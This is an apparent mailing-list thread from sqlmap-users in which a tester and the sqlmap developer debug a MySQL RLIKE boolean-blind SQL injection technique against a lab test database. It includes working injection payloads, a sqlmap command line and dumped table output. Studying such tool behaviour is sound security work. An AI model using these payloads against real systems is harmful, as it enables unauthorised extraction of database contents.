Hi again.
I believe that we have a problem here. I am trying to reproduce your
"problem" and can't do it:
mysql> select * from users;
+----+--------+----------------------------------+
| id | name | surname |
+----+--------+----------------------------------+
| 1 | admin | blissett |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | NULL | nameisnull |
| 5 | md5 | 098f6bcd4621d373cade4e832627b4f6 |
+----+--------+----------------------------------+
5 rows in set (0.00 sec)
mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
(ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
Empty set (0.00 sec)
mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
(ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
(ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN
0x7474747474 ELSE 0x28 END));
ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
mysql> SELECT `name` from users LIMIT 0,1;
+-------+
| name |
+-------+
| admin |
+-------+
1 row in set (0.00 sec)
mysql>
I believe that you have a problem with order of returned results. You can't
expect query results to be returned in deterministic way. That's just how
the DBMS works.
Also, that's why we use ORDER BY wherever we can, to skip this kind of
problems. If you take a look into -v 3 of your run in sqlmap you'll see
that it uses "ORDER BY", while you don't use in your case:
[14:30:20] [PAYLOAD] 1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT
IFNULL(CAST(name AS CHAR),0x20) FROM testdb.users ORDER BY id LIMIT
0,1),6,1))>2) THEN 1 ELSE 0 x28 END))
Kind regards,
Miroslav Stampar
On Sun, Feb 22, 2015 at 2:16 PM, Miroslav Stampar <
miroslav.stam...@gmail.com> wrote:
> "I only bring it up because sql map has no problem grabbing the database
> with rlike but can't enumerate the values from the user table"
>
> $ python sqlmap.py -u "
> http://192.168.223.129/sqlmap/mysql/get_int.php?id=1"; --batch
> --test-filter="RLIKE" --dump -D testdb -T users
>
> ...
>
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> reque
> sts:
> ---
> Parameter: id (GET)
> Type: boolean-based blind
> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
> GROUP BY
> clause
> Payload: id=1 RLIKE (SELECT (CASE WHEN (7668=7668) THEN 1 ELSE 0x28
> END))
> ---
> ...
>
> [14:14:52] [INFO] postprocessing table dump
> Database: testdb
> Table: users
> [5 entries]
> +----+--------+-----------------------------------------+
> | id | name | surname |
> +----+--------+-----------------------------------------+
> | 1 | luther | blissett |
> | 2 | fluffy | bunny |
> | 3 | wu | ming |
> | 4 | NULL | nameisnull |
> | 5 | md5 | 098f6bcd4621d373cade4e832627b4f6 (test) |
> +----+--------+-----------------------------------------+
>
> On Sat, Feb 21, 2015 at 10:59 PM, Brandon Perry <bperry.volat...@gmail.com
> > wrote:
>
>> Right, in the sql statement where I select 'a', the ord of this is not
>> greater than 112, and it fails as expected with parens not balanced.
>>
>> The query below this that selects the first name from users should be
>> functionally equivalent to select 'a' as mid is used to select the first
>> character of the first username which is 'admin' as shown, but this
>> statement does not fail as expected.
>>
>> I am at a loss as to why the latter does not fail when the inner select
>> is functionally equivalent to select 'a', and the former fails as expected.
>>
>> I only bring it up because sql map has no problem grabbing the database
>> with rlike but can't enumerate the values from the user table, and I logged
>> into the server as root to try to figure out what the issue might be and
>> this seems to be the root cause.
>>
>> Sent from a phone
>>
>> On Feb 21, 2015, at 3:35 PM, Miroslav Stampar <miroslav.stam...@gmail.com>
>> wrote:
>>
>> Hi.
>>
>> Maybe I've mistaken, but you are looking this RLIKE wrong. Its function
>> here (in your case) is to PROVOKE errors on False, and that's exactly
>> what's going on here.
>>
>> In case of True, RLIKE is called with perfectly valid 0x7474747474, while
>> in case of False its called with errorneous regexp 0x28 ('parentheses not
>> balanced').
>>
>> Bye
>>
>> On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bperry.volat...@gmail.com
>> > wrote:
>>
>>> Have an injection that I can use RLIKE to induce a 500 error, but it
>>> only works in some circumstances. Enumerating the DATABASE() value works,
>>> as well as the current user, but enumerating values from the database
>>> tables fails. Even as root on the box, the RLIKE query fails to throw an
>>> exception when attempting to use RLIKE in some instances.
>>>
>>> As you can see in the output below, the user can select the first name
>>> value from the users table (which is ‘admin’). When using RLIKE to test the
>>> first character returned with DATABASE() (a ‘p’), you get the parentheses
>>> not balanced exception as expected. You also get this exception when simply
>>> selecting ‘a’.
>>>
>>> But when you select the first row from the users table and grab the
>>> first character (an ‘a’), no exception is thrown and an empty result set is
>>> returned.
>>>
>>> Any thoughts?
>>>
>>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>>> (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>>
>>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>>> (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>>
>>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>>> (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN
>>> 0x7474747474 ELSE 0x28 END));
>>> Empty set (0.01 sec)
>>>
>>> mysql> SELECT `name` from users LIMIT 0,1;
>>> +-------+
>>> | name |
>>> +-------+
>>> | admin |
>>> +-------+
>>> 1 row in set (0.00 sec)
>>>
>>> mysql>
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>>> Get technology previously reserved for billion-dollar corporations, FREE
>>>
>>> http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sqlmap-users@lists.sourceforge.net
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
from Actuate! Instantly Supercharge Your Business Reports and Dashboards
with Interactivity, Sharing, Native Excel Exports, App Integration & more
Get technology previously reserved for billion-dollar corporations, FREE
http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
